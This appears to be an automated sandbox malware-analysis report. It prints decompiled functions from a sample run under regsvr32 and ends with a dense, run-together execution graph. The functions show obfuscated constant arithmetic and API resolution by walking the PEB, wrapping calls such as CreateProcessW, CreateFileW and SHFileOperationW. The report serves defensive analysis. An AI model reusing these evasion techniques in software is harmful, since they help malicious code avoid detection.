                                                                                                                • Opcode Fuzzy Hash: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction Fuzzy Hash: 4BF08C71E0030CFBDB44DBE5D94AA9EBBF0EB50304F20C088D915A7241E7B56B088F41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 53%
                                                                                                                			E008EA50A(void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, intOrPtr _a24, long _a28, intOrPtr _a36, long _a40, intOrPtr _a44, WCHAR* _a48) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t54;
                                                                                                                				void* _t65;
                                                                                                                				signed int _t66;
                                                                                                                				signed int _t67;
                                                                                                                
                                                                                                                				_push(_a48);
                                                                                                                				_push(_a44);
                                                                                                                				_push(_a40);
                                                                                                                				_push(_a36);
                                                                                                                				_push(0);
                                                                                                                				_push(_a28);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(0);
                                                                                                                				E008DC98A(_t54);
                                                                                                                				_v28 = 0xdc14f8;
                                                                                                                				_v24 = 0xd964fd;
                                                                                                                				_v20 = 0;
                                                                                                                				_v16 = 0xcfd091;
                                                                                                                				_v16 = _v16 << 0x10;
                                                                                                                				_v16 = _v16 << 8;
                                                                                                                				_v16 = _v16 ^ 0x910ec0c9;
                                                                                                                				_v12 = 0x7a2ff2;
                                                                                                                				_t66 = 0x43;
                                                                                                                				_v12 = _v12 / _t66;
                                                                                                                				_v12 = _v12 | 0xd721c1d7;
                                                                                                                				_v12 = _v12 ^ 0xd727192a;
                                                                                                                				_v8 = 0x1eb7c0;
                                                                                                                				_v8 = _v8 ^ 0x33199484;
                                                                                                                				_t67 = 0x2d;
                                                                                                                				_v8 = _v8 * 0xa;
                                                                                                                				_v8 = _v8 / _t67;
                                                                                                                				_v8 = _v8 ^ 0x05a21ecf;
                                                                                                                				E008D7F78(_t67, 0xbd3f148a, _t67, 0x203, _t67, 0x939ae237);
                                                                                                                				_t65 = CreateFileW(_a48, _a28, _a40, 0, _a4, _a16, 0); // executed
                                                                                                                				return _t65;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,?,00000000,D727192A,00D964FD,00000000), ref: 008EA5E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction ID: a5e9bdd8e430e0c56135eaeba7ff0ba0af1c875c3c053e1cf78a88fbea8b1997
                                                                                                                • Opcode Fuzzy Hash: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction Fuzzy Hash: E621E272901108FBDF05CFA9C94A8DEBFB6EF48314F108149FA1866220D3728A609F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 39%
                                                                                                                			E008D816B(struct _STARTUPINFOW* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, WCHAR* _a40, intOrPtr _a48, intOrPtr _a52, struct _PROCESS_INFORMATION* _a56, WCHAR* _a60, int _a64) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				void* _t45;
                                                                                                                				int _t52;
                                                                                                                				struct _STARTUPINFOW* _t56;
                                                                                                                
                                                                                                                				_push(_a64);
                                                                                                                				_t56 = __ecx;
                                                                                                                				_push(_a60);
                                                                                                                				_push(_a56);
                                                                                                                				_push(_a52);
                                                                                                                				_push(_a48);
                                                                                                                				_push(0);
                                                                                                                				_push(_a40);
                                                                                                                				_push(0);
                                                                                                                				_push(_a32);
                                                                                                                				_push(0);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(0);
                                                                                                                				_push(__ecx);
                                                                                                                				E008DC98A(_t45);
                                                                                                                				_v12 = 0x5160ce;
                                                                                                                				_v12 = _v12 ^ 0x33bed16b;
                                                                                                                				_v12 = _v12 + 0xffffe3b5;
                                                                                                                				_v12 = _v12 | 0x3554987c;
                                                                                                                				_v12 = _v12 ^ 0x37f1882e;
                                                                                                                				_v8 = 0x57d154;
                                                                                                                				_v8 = _v8 + 0xffff861a;
                                                                                                                				_v8 = _v8 * 0x3e;
                                                                                                                				_v8 = _v8 >> 8;
                                                                                                                				_v8 = _v8 ^ 0x0012f1da;
                                                                                                                				_v16 = 0x81ccd1;
                                                                                                                				_v16 = _v16 >> 4;
                                                                                                                				_v16 = _v16 >> 5;
                                                                                                                				_v16 = _v16 ^ 0x000c22df;
                                                                                                                				E008D7F78(__ecx, 0xbd3f148a, __ecx, 0x245, __ecx, 0x989b5ecc);
                                                                                                                				_t52 = CreateProcessW(_a40, _a60, 0, 0, _a64, 0, 0, 0, _t56, _a56); // executed
                                                                                                                				return _t52;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,00000044,?), ref: 008D8236
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction ID: 5c697b0e105aa3d4cc3b673420f84c441787702ca17787e035b0a608f26c8f5a
                                                                                                                • Opcode Fuzzy Hash: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction Fuzzy Hash: 6B21C372801248BBCF159F95CD09CCEBFB9EF89714F108198FA1562121D3729A65EB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E008D3466(void* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				void* _t29;
                                                                                                                				intOrPtr* _t35;
                                                                                                                				void* _t36;
                                                                                                                				void* _t41;
                                                                                                                
                                                                                                                				_t41 = __ecx;
                                                                                                                				E008DC98A(_t29);
                                                                                                                				_v8 = 0x88f6ec;
                                                                                                                				_v8 = _v8 | 0x6177bf25;
                                                                                                                				_v8 = _v8 >> 0xb;
                                                                                                                				_v8 = _v8 + 0x167f;
                                                                                                                				_v8 = _v8 ^ 0x0004f919;
                                                                                                                				_v16 = 0x9ca171;
                                                                                                                				_v16 = _v16 >> 8;
                                                                                                                				_v16 = _v16 ^ 0x0005b7ae;
                                                                                                                				_v12 = 0xf5b080;
                                                                                                                				_v12 = _v12 * 0x58;
                                                                                                                				_v12 = _v12 ^ 0x54793a02;
                                                                                                                				_t35 = E008D7F78(__ecx, 0xffc5979d, __ecx, 0xcc, __ecx, 0x31e1b46b);
                                                                                                                				_t36 =  *_t35(0, _t41, 0, 0, _a12, __ecx, __edx, 0, 0, _a12, _a16, 0, _a24, _a28, _a32); // executed
                                                                                                                				return _t36;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 008D34FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction ID: daf254395e1aa7eb591bb96168844e27c46b24ae89e3288d5498d2ce689d3bb4
                                                                                                                • Opcode Fuzzy Hash: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction Fuzzy Hash: 8F113671801248BBCB11DFA6DD0AC9FBFB8EB85704F108199F914A2210D3714B24DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E008EEAB3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t35;
                                                                                                                				intOrPtr* _t40;
                                                                                                                				void* _t41;
                                                                                                                
                                                                                                                				E008DC98A(_t35);
                                                                                                                				_v28 = 0xe6c580;
                                                                                                                				_v24 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				_v8 = 0x2d161b;
                                                                                                                				_v8 = _v8 + 0xffffdf88;
                                                                                                                				_v8 = _v8 >> 0xa;
                                                                                                                				_v8 = _v8 | 0xc1e5ff2b;
                                                                                                                				_v8 = _v8 ^ 0xc1e88dee;
                                                                                                                				_v16 = 0xd78d92;
                                                                                                                				_v16 = _v16 ^ 0xcf4c3c1d;
                                                                                                                				_v16 = _v16 ^ 0xcf92c072;
                                                                                                                				_v12 = 0x4f9c9d;
                                                                                                                				_v12 = _v12 >> 4;
                                                                                                                				_v12 = _v12 + 0xffff6ea2;
                                                                                                                				_v12 = _v12 ^ 0x00061ead;
                                                                                                                				_t40 = E008D7F78(__ecx, 0xbd3f148a, __ecx, 0x47, __ecx, 0x6e03cec5);
                                                                                                                				_t41 =  *_t40(_a16, 0, _a12, 0x28, 0x28, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
                                                                                                                				return _t41;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(000B5C15,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,?,00000023), ref: 008EEB5A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction ID: 66ae757ff0a35d9cc63436037d70b63963485e9daf7ac4bfa1017c933fe1a60f
                                                                                                                • Opcode Fuzzy Hash: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction Fuzzy Hash: 36110476C01219BBCF10DFA4990A9EEBF74FB44314F108189E914A6254D3B14A649FA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E008E7DA0(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t34;
                                                                                                                				int _t44;
                                                                                                                				signed int _t46;
                                                                                                                				signed int _t47;
                                                                                                                				struct _SHFILEOPSTRUCTW* _t54;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				_t54 = __edx;
                                                                                                                				_push(__edx);
                                                                                                                				E008DC98A(_t34);
                                                                                                                				_v12 = 0xcdb49a;
                                                                                                                				_v12 = _v12 + 0x8f05;
                                                                                                                				_v12 = _v12 + 0xffff9965;
                                                                                                                				_v12 = _v12 ^ 0x00c100f7;
                                                                                                                				_v16 = 0xfe6a9a;
                                                                                                                				_v16 = _v16 + 0xffff1466;
                                                                                                                				_v16 = _v16 ^ 0x00fd95e9;
                                                                                                                				_v8 = 0xca762f;
                                                                                                                				_v8 = _v8 << 0xe;
                                                                                                                				_t46 = 0x7f;
                                                                                                                				_v8 = _v8 / _t46;
                                                                                                                				_t47 = 0x2e;
                                                                                                                				_v8 = _v8 / _t47;
                                                                                                                				_v8 = _v8 ^ 0x00082e4e;
                                                                                                                				E008D7F78(_t47, 0xffc5979d, _t47, 0xab, _t47, 0x3ddf729);
                                                                                                                				_t44 = SHFileOperationW(_t54); // executed
                                                                                                                				return _t44;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 008E7E36
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3080627654-0
                                                                                                                • Opcode ID: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction ID: c6fbb2b4de2448d49cd1d4e3c45567f987815674e1d73f2d2174b31688ec8b54
                                                                                                                • Opcode Fuzzy Hash: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction Fuzzy Hash: 7B118BB1D00208FFDB14DFA9D80A8DEBBB5EB45314F20C19AE418A7241E7B55F149F41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E008D3506(void* __ecx, void* __edx, void* _a4, long _a8, intOrPtr _a12, long _a16, intOrPtr _a20) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t39;
                                                                                                                				void* _t47;
                                                                                                                				signed int _t49;
                                                                                                                
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				E008DC98A(_t39);
                                                                                                                				_v16 = 0xf4e2fc;
                                                                                                                				_t49 = 0x3b;
                                                                                                                				_v16 = _v16 / _t49;
                                                                                                                				_v16 = _v16 ^ 0x00083f87;
                                                                                                                				_v12 = 0x549d10;
                                                                                                                				_v12 = _v12 << 0xd;
                                                                                                                				_v12 = _v12 + 0xffff8515;
                                                                                                                				_v12 = _v12 | 0x9f85c2ad;
                                                                                                                				_v12 = _v12 ^ 0x9fa0e66d;
                                                                                                                				_v8 = 0xbeaf63;
                                                                                                                				_v8 = _v8 | 0x7acbe5f7;
                                                                                                                				_v8 = _v8 << 0xf;
                                                                                                                				_v8 = _v8 ^ 0x3b62dfe8;
                                                                                                                				_v8 = _v8 ^ 0xcc9b72fd;
                                                                                                                				E008D7F78(_t49, 0xbd3f148a, _t49, 0x106, _t49, 0xba07f621);
                                                                                                                				_t47 = RtlAllocateHeap(_a4, _a16, _a8); // executed
                                                                                                                				return _t47;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(9FA0E66D,?,00083F87), ref: 008D35AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction ID: a8f128a0ed1277b9e9ba17b7cb60e6a4012642d1383916139ae36922e87a8192
                                                                                                                • Opcode Fuzzy Hash: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction Fuzzy Hash: 8C1125B1D00208BFCF04EFA4D84689EBFB5FB44700F208188F914AA221D3728B24EF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E008E02D8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t45;
                                                                                                                				int _t59;
                                                                                                                				signed int _t61;
                                                                                                                				signed int _t62;
                                                                                                                				signed int _t63;
                                                                                                                				signed int _t64;
                                                                                                                				void* _t75;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t75 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E008DC98A(_t45);
                                                                                                                				_v12 = 0xd4268f;
                                                                                                                				_t61 = 0x55;
                                                                                                                				_v12 = _v12 / _t61;
                                                                                                                				_t62 = 0x39;
                                                                                                                				_v12 = _v12 / _t62;
                                                                                                                				_t63 = 0x19;
                                                                                                                				_v12 = _v12 / _t63;
                                                                                                                				_v12 = _v12 ^ 0x00038c24;
                                                                                                                				_v16 = 0xae7fc4;
                                                                                                                				_v16 = _v16 + 0x7c1;
                                                                                                                				_v16 = _v16 ^ 0x00ac1f44;
                                                                                                                				_v8 = 0x83f9bc;
                                                                                                                				_v8 = _v8 ^ 0x1ab9b921;
                                                                                                                				_v8 = _v8 | 0xa5451e1d;
                                                                                                                				_t64 = 0x5c;
                                                                                                                				_v8 = _v8 / _t64;
                                                                                                                				_v8 = _v8 ^ 0x021ff71d;
                                                                                                                				E008D7F78(_t64, 0xbd3f148a, _t64, 0x72, _t64, 0x529e328);
                                                                                                                				_t59 = CloseHandle(_t75); // executed
                                                                                                                				return _t59;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 008E0384
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction ID: 933f288919690a9aa9a1e28883753c12262cfec0420f53500c4f8878acdba44f
                                                                                                                • Opcode Fuzzy Hash: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction Fuzzy Hash: D4113A71E01208FFEB08DFA5D80A9EEBBB5EB84310F50C09AE504AB280E7B15F119F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:17.4%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1037
                                                                                                                Total number of Limit Nodes:15
4649 1e31ea GetPEB 4647->4649 4663 201da1 4647->4663 4648->4555 4649->4647 4652 1f0256 4651->4652 4653 1e7f78 GetPEB 4652->4653 4654 1f02c5 4653->4654 4654->4555 4656 201bf9 4655->4656 4667 1fa873 4656->4667 4660 1e429a 4659->4660 4661 1e7f78 GetPEB 4660->4661 4662 1e42ff 4661->4662 4662->4640 4662->4643 4664 201dba 4663->4664 4665 1e7f78 GetPEB 4664->4665 4666 201e3b 4665->4666 4666->4647 4668 1fa88e 4667->4668 4669 1e7f78 GetPEB 4668->4669 4670 1fa906 4669->4670 4670->4552 4673 1f39a7 4671->4673 4674 20131d GetPEB 4673->4674 4675 1f3b7f 4673->4675 4676 1f3b6a 4673->4676 4703 1ecbbf 4673->4703 4707 1fec35 4673->4707 4674->4673 4675->4577 4678 1f02d8 2 API calls 4676->4678 4678->4675 4680 1f906e 4679->4680 4681 1ecca2 GetPEB 4680->4681 4682 1f9163 4681->4682 4682->4577 4684 200618 4683->4684 4685 1fa50a 2 API calls 4684->4685 4686 200876 4684->4686 4687 200863 4684->4687 4711 1e7e8a 4684->4711 4685->4684 4686->4577 4689 1f02d8 2 API calls 4687->4689 4689->4686 4696 1e7223 4690->4696 4691 1f25cd GetPEB 4691->4696 4692 1e773f 4723 1f8e1d 4692->4723 4694 1ff5d9 2 API calls 4694->4696 4696->4691 4696->4692 4696->4694 4697 1e773d 4696->4697 4699 1ff94b GetPEB 4696->4699 4715 2022f2 4696->4715 4719 1f23c7 4696->4719 4697->4577 4699->4696 4701 1e7f78 GetPEB 4700->4701 4702 20139a 4701->4702 4702->4577 4704 1ecbeb 4703->4704 4705 1e7f78 GetPEB 4704->4705 4706 1ecc88 4705->4706 4706->4673 4708 1fec4c 4707->4708 4709 1e7f78 GetPEB 4708->4709 4710 1fecd5 4709->4710 4710->4673 4712 1e7eb1 4711->4712 4713 1e7f78 GetPEB 4712->4713 4714 1e7f13 4713->4714 4714->4684 4716 202310 4715->4716 4717 1e7f78 GetPEB 4716->4717 4718 2023a9 4717->4718 4718->4696 4720 1f2408 4719->4720 4721 1e7f78 GetPEB 4720->4721 4722 1f247e 4721->4722 4722->4696 4724 1f8e30 4723->4724 4725 1e7f78 GetPEB 4724->4725 4726 1f8ea8 4725->4726 4726->4697 4728 1e7f78 GetPEB 4727->4728 4729 1e8d75 4728->4729 4729->4597 4733 1ea504 4730->4733 4731 1e303a 2 API calls 4731->4733 4732 1ea73d 4735 1e4e8f GetPEB 
4732->4735 4733->4731 4733->4732 4734 1ea73b 4733->4734 4734->4597 4735->4734 4737 1f68f7 4736->4737 4738 1e7f78 GetPEB 4737->4738 4739 1f697d 4738->4739 4739->4597 4741 1ed3d5 4740->4741 4742 1e7f78 GetPEB 4741->4742 4743 1ed45b 4742->4743 4743->3978 4745 1ec0ca 4744->4745 4746 1e7f78 GetPEB 4745->4746 4747 1ec145 4746->4747 4747->3978 4749 200e0b 4748->4749 4750 1e7f78 GetPEB 4749->4750 4751 200e6a 4750->4751 4751->3982 4753 1f266d 4752->4753 4754 1e7f78 GetPEB 4753->4754 4755 1f26e4 4754->4755 4755->3982 4758 1e2312 4756->4758 4757 1f0430 GetPEB 4757->4758 4758->4757 4759 1e303a 2 API calls 4758->4759 4760 1e25ce 4758->4760 4761 1e2606 4758->4761 4759->4758 4770 1f0430 4760->4770 4761->3982 4764 1e7f78 GetPEB 4763->4764 4765 1f3e80 4764->4765 4765->3982 4767 1e7c8d 4766->4767 4768 1e7f78 GetPEB 4767->4768 4769 1e7cf8 4768->4769 4769->3982 4771 1f0463 4770->4771 4772 1e7f78 GetPEB 4771->4772 4773 1f04eb 4772->4773 4773->4761 4775 1fee30 4774->4775 4776 1e7f78 GetPEB 4775->4776 4777 1feeb4 4776->4777 4777->3805 4779 1f6d86 4778->4779 4780 1e7f78 GetPEB 4779->4780 4781 1f6e0c 4780->4781 4781->3997 4783 1e3f7b 4782->4783 4785 1e419a 4783->4785 4786 1e41f2 4783->4786 4803 1e3dfb 4783->4803 4787 1ee4f5 2 API calls 4785->4787 4786->4006 4788 1e41ac 4787->4788 4794 1f3094 4788->4794 4793 1ff94b GetPEB 4793->4786 4807 1f3c24 4794->4807 4798 1e41b8 4799 1e7f31 4798->4799 4800 1e7f56 4799->4800 4801 1eadb7 GetPEB 4800->4801 4802 1e41db 4801->4802 4802->4793 4804 1e3e15 4803->4804 4805 1e7f78 GetPEB 4804->4805 4806 1e3e89 4805->4806 4806->4783 4808 1f3c40 4807->4808 4809 1e7f78 GetPEB 4808->4809 4810 1f31d0 4809->4810 4810->4798 4811 1f660b 4810->4811 4812 1f6638 4811->4812 4813 1e7f78 GetPEB 4812->4813 4814 1f66b2 4813->4814 4814->4798 4816 1e3ed1 4815->4816 4817 1e7f78 GetPEB 4816->4817 4818 1e3f40 4817->4818 4818->4014 4820 1f7a94 4819->4820 4821 1e7f78 GetPEB 4820->4821 4822 1f7b0d 4821->4822 4822->4014 4824 1f3cd4 4823->4824 4825 1e7f78 GetPEB 4824->4825 4826 1f3d50 
